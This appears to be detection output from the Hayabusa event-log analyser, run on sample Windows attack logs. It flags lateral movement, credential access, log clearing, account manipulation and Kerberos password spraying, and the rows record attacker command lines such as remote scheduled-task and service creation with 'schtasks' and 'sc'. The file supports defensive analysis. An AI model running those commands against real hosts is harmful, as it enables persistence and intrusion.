07:00:45.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7976 | PGUID: 747F3D96-938D-5F07-0000-001043A84500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:48.105 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\windows\system32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x68b4a | PID: 8032 | PGUID: 747F3D96-9390-5F07-0000-00105CBC4500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:58.550 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52547 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7456 | PGUID: 747F3D96-939F-5F07-0000-0010888E4600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | LID: 0x68b4a | PID: 7200 | PGUID: 747F3D96-93A2-5F07-0000-00108EC54600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 3096 | PGUID: 747F3D96-94C3-5F07-0000-001080B40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x3bfab | PID: 3248 | PGUID: 747F3D96-94CF-5F07-0000-0010BD590400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: rdpclip | Process: C:\Windows\System32\rdpclip.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService | LID: 0x3bfab | PID: 3304 | PGUID: 747F3D96-40F2-5F08-0000-0010D8A92C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.589 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:53627 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 824 | PGUID: 747F3D96-1350-5F08-0000-001014C50000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""\\tsclient\c\temp\stack\a.exe"" | Process: \\tsclient\c\temp\stack\a.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3bfab | PID: 4236 | PGUID: 747F3D96-40F5-5F08-0000-001095812D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx 
+2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin 
Shares/ID5142- New file share created.evtx +2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 06:09:03.249 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /create /s fs02 /tn 
tasks_test_hacker2 /tr myapp.exe /sc daily /mo 10 | Path: C:\Windows\System32\schtasks.exe | PID: 0x1e18 | User: lambda-user | LID: 0x1d41a5fa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx +2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-12 06:46:39.786 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc \\fs02\ create hacker-testl binPath=""virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x53c | User: admmig | LID: 0x58dbaa",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx +2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 06:50:07.213 +09:00,fs02.offsec.lan,7045,info,,New Service Installed,Name: bad-task | Path: virusé.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 14:10:08.442 
+09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx +2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,low,Persis,Local User Account Created,User: hacking-local-acct | SID: S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick 
added-removed user from local group.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 
0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 
+2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 
0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 
+2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 
0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Global Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 
0x80e25b9,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Local Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: FAKE-COMPUTER$ | SID: S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,LatMov,Protected Storage Service 
Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx +2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: 